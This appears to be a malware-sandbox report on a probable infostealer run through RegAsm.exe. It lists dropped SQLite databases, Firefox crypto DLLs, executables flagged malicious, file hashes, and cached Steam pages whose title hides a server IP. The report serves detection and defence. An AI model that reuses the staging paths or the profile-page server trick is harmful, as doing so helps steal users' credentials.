MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\DHCAEC-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\EHJDGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\FIJECA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\HCBAKJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\HJECAA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\HJECAA-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGHDAKKJJJKJ\HJJKFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIEHJDHCBA.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BKKFCFBKFC.exe.log

Download File

Process:	C:\ProgramData\BKKFCFBKFC.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CFHIIEHJKK.exe.log

Download File

Process:	C:\ProgramData\CFHIIEHJKK.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1081
Entropy (8bit):	5.3495313663879385
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeBE4D2ca:MxHKlYHKh3oPtHo6hAHKzeBHCJ
MD5:	D9A01D6A41EC5AA7A4194CF10BC63F73
SHA1:	65D36393787E66A8CE9E7845CCD76A2EF9575FCB
SHA-256:	A4321903A0AF8F49D85FF181BE8FF2E9053F0A64501541284D78E19D41B578F2
SHA-512:	CC127819B3D9A7E24FD6C0183AD06A8AE7B3C7F3D3A8E8F29CCED78BDD428745E71B89EE481689073B03A09F026975D4A64F749B95FE945AF283202AB8C96BB1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Di

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GIEHJDHCBA.exe.log

Download File

Process:	C:\ProgramData\GIEHJDHCBA.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.39839628075162
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2SN:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFE
MD5:	B0AE396245B78661F087552578C07254
SHA1:	0C5429AACA35DF804754ADB93635A43D089434D4
SHA-256:	BC02296F9225309F8A1946DCAEF9E029338690655568741D873605B72FC05BFC
SHA-512:	5EB824998C0E3064C6BAAA28D4D6088C8C4F67484B7302161424C0814530EEFC6AAE2FA3A07411451D651FDB9470A1726FF03D1CC29F8872B5ED587E13898097
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.39866023967234
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2SV:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFk
MD5:	431E5FADA0419EEF268321F85D97ABC0
SHA1:	F773F131C590F0729D2E26319A0208DAB0CFBCD5
SHA-256:	1B4B80BC202C5D7341705DFAEE2C542C2B8A2A71F9BBAB4E422C803F545089E0
SHA-512:	021494DC03017D2D7A7E5EE033226F966C304C02E04B906E9C124934C2C57973E014711112D9FE773E67E60B0A276969AA7CB4EAB9140E6A8215AF71513ED9C8
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5db9e54794_vfkagks[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
